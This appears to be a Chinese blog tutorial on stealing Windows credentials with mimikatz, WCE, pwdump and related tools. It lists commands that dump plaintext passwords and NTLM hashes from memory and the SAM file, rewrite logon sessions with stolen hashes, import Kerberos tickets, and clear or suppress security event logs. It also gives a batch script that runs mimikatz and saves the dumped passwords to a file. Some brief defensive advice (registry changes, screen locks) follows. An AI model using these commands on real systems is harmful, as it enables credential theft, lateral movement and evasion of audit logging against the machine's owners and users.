3 winlogon.exe 中的用户信息
- 获取winlogon.exe进程中用户的账户与密码信息,对于Windows 2000/XP可以用FindPass,对于Windows XP以及Windows Server 2003可以用WinlogonHack,而对于Windows XP、Windows Server 2003、Windows Server 2008、Windows Vista、Windows 7以及 Windows 7 SP1都可以用mimikatz。
- 演示环境:任意一种操作系统主机,此处以64位Windows 7操作系统主机为例。 演示工具:mimikatz 2.1。
操作概要: ①运行软件; ②输入命令,提升权限,获取密码。
-
windows下缓存密码:
1.浏览器Cookie密码,一般在设置->高级->隐私那里可以明文查看密码
2.windows网络程序密码,比如邮箱,MSN等
控制面板\所有控制面板项\凭据管理器
3.wifi密码
需要在图形界面才能看到,下面有一款工具可以命令行界面下显示wifi密码
4.图形化密码获取工具
http://www.nirsoft.net/password_recovery_tools.html
里面有很多密码缓存读取工具:
ChatTools OutLookMail IE Wireless WebBrowser Chrome RemoteDesktop
5.pwdDump 在kali下有(读取SAM文件)
usr/share/windows-binaries/fgdump
如果系统没有加入域,仅在工作组:
pwdDump.exe localhost 可获取密码hash值
6.hash 破解 复制hash值:
king:1003:8C6F5D02DEB21501AAD3B435B51404EE:E0FBA38268D0EC66EF1CB452D5885E53:::
到Kali 系统 ,使用Ophcrack工具对其破解即可,默认只破解简单的纯字母和纯数字,需要下载字典tables 才能破解复杂的密码
7.WCE 破解windows密码 ,在kali下有:(读取内存值)
该方法可以获取当前还未注销的用户密码,切换用户可以同时让多个用户会话并存于内存中
/usr/share/wce/
wce-universal.exe -l 列出hash值
wce-universal.exe -lv 列出详细信息
wce-universal.exe -d 0008E1E0 指定LUID会话删除
wce-universal.exe -r 周期性列出登录会话
wce-universal.exe -g 123456 生成123456的LM/NT 哈希
wce-universal.exe -w 明文显示hash密码
wce-universal.exe -i 0008E1E0 -s 000DB0B2:demon:PX-B350356F8BD4:E0C510199CC66ABDAAD3B435B51404EE:352DFE551D62459B20349B78A21A2F37
修改指定的登录会话为其他会话信息
如何防止别人通过wce 查看明文密码?
默认windows启动了安全包 NTLM Security Package 会在内存维护明文密码
可以通过注册表的修改,禁止Digest Authentication Package显示明文在内存中
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\下的 Security Packages(右边)其值为:
kerberos
msv1_0
schannel
wdigest 本地登录的明文密码维护
tspkg 远程登录的明文密码维护
pku2u
想要防止需要把 wdigest 和 tspkg 两个值删除
记得要删彻底不能留换行符,否则注册表爆错
重启后发现无法读取明文密码了
另外注意: 如果注册表里删除了wdigest的值,继续使用wce -w 注入dll
的话会导致注入失败,从而导致系统损坏LSA shell报错
不过重启后仍然可以正常使用系统
[windows运行命令] eventvwr
8 Windows渗透神器: Mimikatz.exe
kali路径: /usr/share/mimikatz/
privilege::debug 提权为system debug权限
sekurlsa::logonPasswords 列出当前登录的用户明文密码,包含wdigest kerberos
sekurlsa::kerberos 读取域下的用户会话明文密码
sekurlsa::wdigest 读取本地用户会话的明文密码
process::list 列出当前系统的所以进程
process::start cmd.exe 启动进程
process::stop /pid:2844 关闭进程
process::suspend /pid:2768 暂停进程
process::resume /pid:2768 恢复进程
service::list 列出服务
lsadump::sam 获取sam文件的hash值
lsadump::cache 获取缓存内容
ts::session 查看现有的登录会话
ts::multirdp 远程桌面单用户多会话补丁
event::clear 清除安全日志
event::drop 后面的操作不再产生新的日志
minesweeper::infos 扫雷透视
misc::cmd 打开cmd
misc::regedit 打开注册表
misc::taskmgr 任务管理器
misc::wifi 查看所有以保存的wifi密码
token::list 列出windows票据
token::whoami 列出当前会话票据
kerberos::list 查看所有票据
kerberos::purge 清除票据
kerberos::ptc TGT_user@xxx.com 导入票据
- 改进mimikatz工具,使其不必在DOS界面中输入命令,而是用bat启动的方法获取系统的用户名和密码信息,并写入记事本文件中。
mimikatz 是DOS界面,所以可以用bat启动,具体操作如下:
① 打开记事本,在其中输入如下代码:
@Echo Off
title
color 3B
mode con: cols=37 lines=13
cd %~dp0
mimikatz64.exe "privilege::debug" "sekurlsa::logonpasswords">>password.txt
pause
exit
② 将该文件保存至mimikatz64.exe所在的文件夹,并命名为start.bat;
③ 右键点击,以管理员身份运行start.bat文件;
④ 在文件夹下查看password.txt文件,里面便有获取的系统账户和密码信息。
mimikatz的功能相对比较强大,对现行的Windows系统基本通杀,而 且目前微软没有相应的补丁来解决这个漏洞。因此,针对该类软件的 防范措施主要有三个方面: ① 硬件安全。保证计算机硬件不被可疑人员接触,这是保证系统安 全的首要条件。 ② 设置屏幕保护密码。设置屏幕保护密码,使得用户离开计算机时, 能及时将屏幕锁定。 ③ 变更用户时重启计算机。
推荐阅读
-
在 "全信息 "智能电站中,电能表与终端传感模块和 Iconcentrator 之间的主要通信技术是什么?
-
在 Mac 主机上的 Docker 容器中实现图形用户界面显示(运行图形用户界面应用程序)
-
用户界面设计中的 IOS14 设计规范
-
C++医学影像 PACS】CT 检查中的 3D 重建是一种怎样的检查?
-
vue3 中的 toRaw
-
微信 "扫一扫 "物联网,全面揭秘 "扫一扫 "背后的扫盲技术!-1.1 扫一扫感知物体是做什么的? 1.1 微信扫一扫是做什么的? 扫一扫识物是指以图片或视频(商品图片:鞋/包/美妆/服饰/家电/玩具/图书/食品/珠宝/家具/其他商品)为输入媒介,挖掘微信内容生态中的有价值信息(电商+百科+资讯,如图1所示),并展示给用户。这里的电商基本涵盖了微信小程序覆盖上亿SKU的全量优质电商,可以支持用户货比N家并直接下单购买,百科和资讯则聚合了微信内的头部自媒体如搜狗、搜搜、百度等,向用户展示和分享拍摄商品相关的内容资讯。 图 1 扫一扫识别功能示意图 欢迎大家更新iOS新版微信→扫一扫→识货,亲自体验,也欢迎大家通过识货界面的反馈按钮向我们提交反馈意见。 扫一扫识物实景图展示 1.2 扫一扫识物有哪些使用场景? 扫一扫识物的目的是为用户访问微信内部生态内容开辟一个新窗口,以用户扫图片为输入形式,为用户提供微信生态内容中的百科、资讯、电商等作为展示页面。除了用户熟悉的扫一扫操作外,我们还将进一步拓展长按操作,让用户更方便地进行扫一扫操作。"扫一扫知事 "的落地场景主要涵盖三大部分: a. 科普知识: a.科普知识。用户通过扫一扫,可以在微信生态圈中获取该对象的百科、资讯等常识或趣闻,帮助用户更好地了解该对象; b.购物场景。同样的搜索功能支持用户看到喜欢的商品立即检索到微信小程序电商中的同款商品,支持用户即扫即购; c.广告场景。扫一扫识别物体可以辅助公众号文章、视频更好地理解其中蕴含的图片信息,从而更好地投放匹配广告,提高点击率。 1.3 Sweep Sense 为 Sweep 家族带来了哪些新技术? 对于扫一扫来说,大家耳熟能详的应该就是扫一扫二维码、扫一扫小程序码、扫一扫条形码、扫一扫翻译了。无论是各种形式的编码还是文字字符,都可以看作是图片的一种特定编码形式,而物的识别则是对自然场景图片的识别,这对于扫一扫家族来说是一个质的飞跃,我们希望从物的识别入手,进一步拓展扫一扫对自然场景图片的理解能力,比如扫酒、扫车、扫植物、扫人脸等服务,如下图3所示。 图 3 Sweep 家族
-
在 Linux 命令行中查看图像的 3 种方法 - 1. FIM
-
修改 word 文档创建者的方法有哪些?如何修改文档的作者 这两种方法你必须知道 - 软件下载地址:https://www.huibang168.com/static/upload/2Lph6q3Q/file/81/HuibangMetadata_3.7.0.0.exe 除了在 Word 中修改作者信息外,您还可以通过修改文档的元数据来更改作者。元数据存储在文档内部,用于描述文档数据的属性。 具体步骤如下
-
使用 JWT、Interceptor 和 ThreadLocal 在任何位置获取令牌中的信息,并将其与自定义注解相结合,实现方法的身份验证。
-
测量两个人之间的关系从用户输入的姓名中获取笔画数的小程序!